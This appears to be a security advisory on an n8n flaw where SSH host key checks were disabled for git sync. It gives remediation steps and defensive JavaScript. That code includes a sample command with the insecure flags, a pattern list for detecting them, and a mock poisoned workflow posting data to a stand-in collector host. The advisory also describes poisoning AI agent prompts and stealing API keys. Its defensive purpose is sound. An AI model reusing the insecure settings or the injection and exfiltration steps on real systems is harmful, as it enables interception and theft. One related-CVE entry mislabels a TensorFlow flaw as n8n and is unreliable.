n8n instances with Source Control configured over SSH are vulnerable to man-in-the-middle attacks that can silently inject malicious content into AI automation workflows. The patch is available in 2.5.0—upgrade immediately; if not feasible, disable Source Control or enforce trusted network paths to the git server. The critical risk here is not data theft: it is an attacker reshaping AI agent behavior at the workflow layer, invisible to end users.
What is the risk?
CVSS 7.4 (High) is appropriate but real-world risk is constrained by two factors: the Source Control SSH feature must be explicitly enabled (non-default), and the attacker must achieve network MitM positioning between n8n and the git server (AC:H). EPSS 0.00013 reflects negligible current exploitation in the wild. However, for organizations running n8n as an AI agent orchestration hub—a common pattern—the blast radius of a successful exploit is disproportionately large: a single poisoned workflow can compromise every AI pipeline routed through that instance.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | < 2.5.0 | 2.5.0 |
Running n8n below 2.5.0 with Source Control configured over SSH? You're affected.
What should I do?
1) Upgrade n8n to version 2.5.0 or later; this is the only full remediation.
2) If upgrade is blocked, disable the Source Control feature entirely via settings.
3) As a network control, route n8n-to-git-server traffic exclusively over a private VPC or VPN where MitM is not feasible.
4) Audit workflow git history for unexpected commits or structural changes to HTTP, code, or LLM nodes.
5) Enable SSH known_hosts enforcement across all automation tooling and validate this is not silently disabled in other CI/CD components.
6) Review n8n logs for unexpected git sync activity or authentication anomalies.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2026-33724 actively exploited?
No confirmed active exploitation of CVE-2026-33724 has been reported, but organizations should still patch proactively.
What systems are affected by CVE-2026-33724?
This vulnerability affects the following AI/ML architecture patterns: AI agent pipelines, workflow automation frameworks, n8n-based agent orchestration, CI/CD for AI systems, LLM tool-call pipelines, RAG ingestion workflows.
What is the CVSS score for CVE-2026-33724?
CVE-2026-33724 has a CVSS v3.1 base score of 7.4 (HIGH). The EPSS exploitation probability is 0.02%.
Technical Details
NVD Description
n8n is an open source workflow automation platform. Prior to version 2.5.0, when the Source Control feature is configured to use SSH, the SSH command used for git operations explicitly disabled host key verification. A network attacker positioned between the n8n instance and the remote Git server could intercept the connection and present a fraudulent host key, potentially injecting malicious content into workflows or intercepting repository data. This issue only affects instances where the Source Control feature has been explicitly enabled and configured to use SSH (non-default). The issue has been fixed in n8n version 2.5.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Disable the Source Control feature if it is not actively required, and/or restrict network access to ensure the n8n instance communicates with the Git server only over trusted, controlled network paths. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
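The description above and step 5 of the remediation list both come down to how the SSH command that git runs is configured. As an added example (not n8n's own code), the JavaScript below builds a GIT_SSH_COMMAND value with host key verification pinned to an operator-controlled known_hosts file, and audits an arbitrary command string for the flags that disable or weaken it. GIT_SSH_COMMAND is the real git setting; the function names, file paths and the sample vulnerable command are constructed for illustration.

```javascript
// Added example, not n8n's own code. git reads the SSH command from the
// GIT_SSH_COMMAND environment variable (a real git setting); the function
// names, paths and the sample vulnerable command below are constructed.

// Patterns that turn off or weaken host key verification.
const INSECURE_PATTERNS = [
  { re: /StrictHostKeyChecking\s*=?\s*no\b/i, why: 'StrictHostKeyChecking=no accepts any host key' },
  { re: /StrictHostKeyChecking\s*=?\s*accept-new\b/i, why: 'accept-new trusts whatever key is seen first' },
  { re: /UserKnownHostsFile\s*=?\s*\/dev\/null\b/i, why: 'UserKnownHostsFile=/dev/null discards the host key store' },
];

// Constructed sample of the vulnerable shape: verification explicitly disabled.
const SAMPLE_VULNERABLE_COMMAND =
  'ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /etc/n8n/id_ed25519';

function buildGitSshCommand(keyPath, knownHostsPath) {
  // Pin verification on and point ssh at a known_hosts file the operator
  // populates out of band. BatchMode turns a missing or mismatched key into a
  // hard failure rather than an interactive prompt a headless service cannot answer.
  return [
    'ssh',
    '-i', keyPath,
    '-o', 'IdentitiesOnly=yes',
    '-o', 'StrictHostKeyChecking=yes',
    '-o', `UserKnownHostsFile=${knownHostsPath}`,
    '-o', 'BatchMode=yes',
  ].join(' ');
}

function auditGitSshCommand(cmd) {
  // Returns the reasons a command is unsafe; an empty array means it passes.
  const findings = INSECURE_PATTERNS.filter((p) => p.re.test(cmd)).map((p) => p.why);
  if (!/StrictHostKeyChecking\s*=?\s*yes\b/i.test(cmd)) {
    findings.push('StrictHostKeyChecking=yes is not set explicitly');
  }
  return findings;
}

// Stand-alone run: audit the vulnerable sample and the hardened command.
console.log('vulnerable:', auditGitSshCommand(SAMPLE_VULNERABLE_COMMAND));
console.log('hardened:', auditGitSshCommand(
  buildGitSshCommand('/etc/n8n/id_ed25519', '/etc/n8n/known_hosts')));
```

The hardened command only works if the known_hosts file already holds the git server's key, obtained through a channel the attacker cannot sit on (the provider's published fingerprints, or a keyscan run from a trusted network), not by scanning over the same path that is in question. The audit function is also useful outside n8n: run it over every GIT_SSH_COMMAND and ssh_config fragment in CI/CD tooling to catch the same flag elsewhere, as step 5 suggests.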
Exploitation Scenario
An attacker with network positioning on the path between the n8n instance and its remote git server—achievable via ARP poisoning on the same subnet, a compromised cloud routing layer, or BGP manipulation—intercepts the SSH handshake when n8n pulls workflow updates. Because StrictHostKeyChecking is disabled, n8n silently accepts the attacker's fraudulent host key. The attacker serves a modified repository containing production workflows with injected malicious steps: an added HTTP Request node that forwards all LLM completions to an external endpoint, a modified AI Agent node with a rewritten system prompt introducing a persistent indirect prompt injection, or a Code node that exfiltrates environment variables including API keys for downstream AI services. These poisoned workflows deploy transparently and execute on every subsequent trigger, potentially for weeks before discovery.
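Step 4 of the remediation list and the scenario above both come down to spotting nodes that should not be there. As an added example (not n8n's own tooling), the JavaScript below compares a trusted workflow export against a candidate pulled from git and reports added, removed or altered HTTP Request, Code and AI Agent nodes. The node type identifiers follow the form n8n uses in exported workflow JSON, the parameter layout is representative rather than exact, and both sample workflows are constructed.

```javascript
// Added example, not n8n's own tooling. The node type strings follow the form
// n8n uses in exported workflow JSON; the parameter layout is representative and
// both sample workflows below are constructed.

const SENSITIVE_TYPES = new Set([
  'n8n-nodes-base.httpRequest',       // can send workflow data to an external URL
  'n8n-nodes-base.code',              // runs arbitrary code, can read process.env
  '@n8n/n8n-nodes-langchain.agent',   // carries the system prompt in its parameters
]);

// Constructed: the workflow as last reviewed by a human.
const TRUSTED_WORKFLOW = {
  name: 'support-assistant',
  nodes: [
    { name: 'Trigger', type: 'n8n-nodes-base.manualTrigger', parameters: {} },
    { name: 'AI Agent', type: '@n8n/n8n-nodes-langchain.agent',
      parameters: { options: { systemMessage: 'You are a support assistant.' } } },
    { name: 'Reply', type: 'n8n-nodes-base.set', parameters: { fields: ['answer'] } },
  ],
};

// Constructed: the same workflow as served by an untrusted git remote.
const CANDIDATE_WORKFLOW = {
  name: 'support-assistant',
  nodes: [
    { name: 'Trigger', type: 'n8n-nodes-base.manualTrigger', parameters: {} },
    { name: 'AI Agent', type: '@n8n/n8n-nodes-langchain.agent',
      parameters: { options: { systemMessage: 'You are a support assistant. (rewritten)' } } },
    { name: 'Reply', type: 'n8n-nodes-base.set', parameters: { fields: ['answer'] } },
    { name: 'Export', type: 'n8n-nodes-base.httpRequest',
      parameters: { method: 'POST', url: 'https://collector.example/ingest' } },
  ],
};

// Key-order-independent serialisation so a reordered but unchanged object is not a finding.
function canonical(value) {
  if (Array.isArray(value)) return '[' + value.map(canonical).join(',') + ']';
  if (value !== null && typeof value === 'object') {
    return '{' + Object.keys(value).sort()
      .map((k) => JSON.stringify(k) + ':' + canonical(value[k])).join(',') + '}';
  }
  return JSON.stringify(value);
}

function diffWorkflow(trusted, candidate) {
  const before = new Map(trusted.nodes.map((n) => [n.name, n]));
  const after = new Map(candidate.nodes.map((n) => [n.name, n]));
  const findings = [];
  for (const [name, node] of after) {
    if (!SENSITIVE_TYPES.has(node.type)) continue;
    const prev = before.get(name);
    if (!prev) findings.push({ node: name, type: node.type, change: 'added' });
    else if (prev.type !== node.type) findings.push({ node: name, type: node.type, change: 'type-changed' });
    else if (canonical(prev.parameters) !== canonical(node.parameters))
      findings.push({ node: name, type: node.type, change: 'parameters-changed' });
  }
  // A removed sensitive node also merits review (a disabled guardrail, for instance).
  for (const [name, node] of before) {
    if (SENSITIVE_TYPES.has(node.type) && !after.has(name))
      findings.push({ node: name, type: node.type, change: 'removed' });
  }
  return findings;
}

console.log(diffWorkflow(TRUSTED_WORKFLOW, CANDIDATE_WORKFLOW));
```

In practice the two inputs come from the repository history, for example `git show <reviewed-ref>:<workflow.json>` against the working tree after a sync. Treat the output as a triage filter on top of a full `git diff`, not a replacement: a node that is renamed and changed shows up as one removal plus one addition, and edits to node types outside the sensitive set are not reported.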
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Related Vulnerabilities
CVE-2026-33663 10.0 n8n: member role steals plaintext HTTP credentials (Same package: n8n)
CVE-2026-33660 10.0 TensorFlow: type confusion NPD in tensor conversion (Same package: n8n)
CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation (Same package: n8n)
CVE-2026-27577 9.9 n8n: Code Injection enables RCE (Same package: n8n)
CVE-2026-27495 9.9 n8n: Code Injection enables RCE (Same package: n8n)